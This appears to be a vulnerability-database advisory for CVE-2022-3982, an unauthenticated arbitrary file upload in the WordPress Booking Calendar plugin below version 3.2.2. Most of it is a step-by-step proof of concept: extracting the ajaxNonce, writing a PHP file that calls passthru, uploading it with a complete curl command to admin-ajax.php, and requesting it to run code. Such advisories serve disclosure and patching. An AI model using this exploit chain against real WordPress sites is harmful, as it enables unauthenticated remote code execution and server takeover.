Lucene search
CydaveWPEX-ID:4D91F3E1-4DE9-46C1-B5BA-CC55B7726867HistoryNov 21, 2022 - 12:00 a.m.
Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload
2022-11-2100:00:00
cydave
164
wordpress
unauthenticated
file upload
security vulnerability
nonce
curl
exploit
0.289 Low
EPSS
Percentile
96.9%
The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE
1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:
echo '<?php passthru("id"); ?>' > /tmp/poc.php
4. Upload the payload with cURL, with the previously extracted nonce:
curl -i https://example.com/wp-admin/admin-ajax.php \
-F 'action=wpdevart_form_ajax' \
-F 'wpdevart_id=x' \
-F 'wpdevart_nonce=<NONCE HERE>' \
-F 'wpdevart_data={"wpdevart-submit":"X"}' \
-F 'wpdevart-submit=1' \
-F 'file=@/tmp/poc.php'
5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"
curl -i https://example.com/wp-content/uploads/booking_calendar/poc.phpRelated
prion
prion
Default credentials
2022-12-12 18:15:00
nvd
nvd
CVE-2022-3982
2022-12-12 18:15:12
nuclei
nuclei
WordPress Booking Calendar <3.2.2 - Arbitrary File Upload
2023-03-31 11:28:24
openvas
openvas
cve
cve
CVE-2022-3982
2022-12-12 18:15:12
wpvulndb
wpvulndb
Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload
2022-11-21 00:00:00
cvelist
cvelist